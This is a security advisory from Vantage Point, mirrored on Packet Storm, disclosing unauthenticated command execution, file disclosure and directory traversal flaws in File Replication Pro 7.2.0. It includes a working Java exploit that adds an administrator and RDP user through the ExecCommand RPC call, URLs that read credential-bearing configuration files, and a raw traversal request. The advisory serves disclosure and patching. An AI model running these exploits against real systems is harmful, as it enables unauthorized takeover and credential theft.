File Replication Pro 7.2.0 Command Execution / File Disclosure / Traversal

2016-02-11T00:00:00
ID PACKETSTORM:135715
Type packetstorm
Reporter Jerold Hoong
Modified 2016-02-11T00:00:00

Description

                                        
                                            `Vantage Point Security Advisory 2016-001  
================================  
  
Title: File Replication Pro Remote Command Execution  
Vendor: File Replication Pro  
Vendor URL: http://www.filereplicationpro.com/  
Versions affected: =< 7.2.0  
Severity: High  
Vendor notified: Yes  
Reported: 29 October 2015  
Public release: 10 February 2016  
Author: Jerold Hoong and the VP team <jerold[at]vantagepoint[dot]sg>  
Permalink:  
  
Summary:  
--------  
File Replication Pro (FRP) is a file management solution that is used  
to back up and copy files from various nodes in the network. Vantage  
Point has discovered multiple vulnerabilities in FRP v7.2.0 (and  
possibly prior versions) that allow a remote unauthenticated malicious  
run arbitrary code with SYSTEM privileges.  
  
The vulnerabilities that were discovered are:  
  
- Unauthenticated Remote Command Execution  
- Unauthenticated Remote Arbitrary File Disclosure  
- Unauthenticated Directory Traversal and File Listing  
  
1. Unauthenticated Remote Command Execution  
-------------------------------------------  
The backup agents implements a RPC service port 9200 that supports  
various calls, including a function called "ExecCommand" that  
unsurprisingly executes shell commands on the system. A password hash  
is used to authenticate calls on this interface (note that the hash  
itself and not the password is used for authentication). This hash can  
be obtained from the remote file disclosure vulnerability present in  
the software (listed below) and used to authenticate to the RPC  
service, where subsequently, arbitrary commands are executed as the  
SYSTEM user.  
  
POC Exploit Code of Malicious RPC Client:  
  
/**  
* @author Jerold Hoong (Vantage Point Security)  
* File Replication Pro =< v7.2.0  
* Remote Command Execution PoC Working Exploit  
* www.vantagepoint.sg  
* NOTE: Include FRP libraries to compile  
*/  
  
import java.io.IOException;  
import java.util.HashMap;  
import java.util.Map;  
import net.diasoft.frp.engine.exception.RPCException;  
import net.diasoft.frp.engine.model.AddressPort;  
import net.diasoft.frp.engine.tcp.client.RPCDriver;  
import net.diasoft.frp.engine.tcp.client.TCPConnection;  
  
public class Main {  
  
static String ip = "1.2.3.4";  
static int port = 9200;  
// password string can be retrieved from remote file disclosure  
vulnerability (configuration.xml)  
// If no password is set, input blank string for password  
// Use IE to navigate to <Target IP>:9200. OK = NO-AUTH, Error = AUTH  
  
static String password = ""; // password 12345 jLIjfQZ5yojbZGTqxg2pY0VROWQ=  
  
public static void main(String[] args) {  
  
AddressPort ap = new AddressPort(ip, port);  
AddressPort addresses[] = {ap};  
TCPConnection _tcp_connection = null;  
  
try {  
_tcp_connection = new TCPConnection(addresses, password, true);  
  
} catch (Exception e) {  
e.printStackTrace();  
}  
  
System.out.print("Connecting to host...");  
RPCDriver rpc = new RPCDriver(_tcp_connection);  
HashMap p = new HashMap();  
  
try {  
Map r = rpc.callFunction("ExecCommand", p);  
System.out.print("Success!\n");  
} catch (RPCException e) {  
e.printStackTrace();  
} catch (IOException e) {  
e.printStackTrace();  
} catch (ClassNotFoundException e) {  
  
e.printStackTrace();  
}  
  
// add new user  
System.out.print("Attempting to add user 'vantagepoint' with  
password 'LOLrofl1337!': ");  
p.put("COMMAND", "net user vantagepoint LOLrofl1337! /add");  
try {  
Map r = rpc.callFunction("ExecCommand", p);  
} catch (RPCException e) {  
e.printStackTrace();  
} catch (IOException e) {  
e.printStackTrace();  
} catch (ClassNotFoundException e) {  
  
e.printStackTrace();  
}  
  
// add new user to Admin group  
System.out.print("Attempting to add user 'vantagepoint' to  
'Administrators' group: ");  
p.put("COMMAND", "net localgroup \"Administrators\" vantagepoint /add");  
try {  
Map r = rpc.callFunction("ExecCommand", p);  
} catch (RPCException e) {  
e.printStackTrace();  
} catch (IOException e) {  
e.printStackTrace();  
} catch (ClassNotFoundException e) {  
  
e.printStackTrace();  
}  
  
//add new user to RDP group  
System.out.print("Attempting to add user 'vantagepoint' to  
'Remote Desktop Users' group:");  
p.put("COMMAND", "net localgroup \"Remote Desktop Users\"  
vantagepoint /add");  
try {  
Map r = rpc.callFunction("ExecCommand", p);  
} catch (RPCException e) {  
e.printStackTrace();  
} catch (IOException e) {  
e.printStackTrace();  
} catch (ClassNotFoundException e) {  
  
e.printStackTrace();  
}  
System.out.print("\n\n---- END ----\n\n");  
  
}  
}  
  
  
2. Unauthenticated Remote Arbitrary File Disclosure  
---------------------------------------------------  
A flaw in File Replication Pro allows a malicious user to gain access  
to the contents of any file on the remote server. This leads to the  
compromise of sensitive information such as user accounts and password  
hashes, which can then be used to further exploit the server using  
other vulnerabilities in the software. An example of how to view File  
Replication Pro's web interface user accounts and credentials is shown  
below by accessing the following URLs:  
  
- http://1.2.3.4:9100/DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\\etc\\properties.xml  
- http://1.2.3.4:9100/DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\\etc\\configuration.xml  
  
  
3. Unauthenticated Directory Traversal and File Listing  
-------------------------------------------------------  
It was possible to anonymously view the file directory structure of  
the remote File Replication Pro management server as well as the file  
directory structure of all server nodes that are managed by the  
management server. The parameters that are used to construct the POST  
request in the example code below can be obtained via the remote file  
disclosure vulnerability by accessing File Replication Pro's  
configuration.xml, properties.xml and .frp_id files.  
  
POST /GetRemoteDirList.jsp?server_name=WIN7SP1&server_key=WIN7SP1~29d919a3:150c736b708:-8000&server_role=Source&server_password=&parent_dir=../../../c:/  
HTTP/1.1  
Host: 127.0.0.1:9100  
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://127.0.0.1:9100/AddEditJob.do?action=new  
Cookie: show_greeting=value; JSESSIONID=81cgjqf795cai  
Connection: keep-alive  
Pragma: no-cache  
Cache-Control: no-cache  
Content-Length: 0  
  
  
Fix Information:  
----------------  
Upgrade to the latest version of File Replication Pro 7.3.0  
  
Timeline:  
---------  
28 October 2015 - Vulnerabilities discovered  
06 November 2015 - Vendor acknowledged and scheduled fixes to commence  
02 February 2016 - Patch released by vendor  
10 February 2016 - Release of this advisory to the public  
  
About Vantage Point Security:  
-----------------------------  
  
Vantage Point is the leading provider for penetration testing and  
security advisory services in Singapore. Clients in the Financial,  
Banking and Telecommunications industries select Vantage Point  
Security based on technical competency and a proven track record to  
deliver significant and measurable improvements in their security  
posture.  
  
https://www.vantagepoint.sg/  
office[at]vantagepoint[dot]sg  
`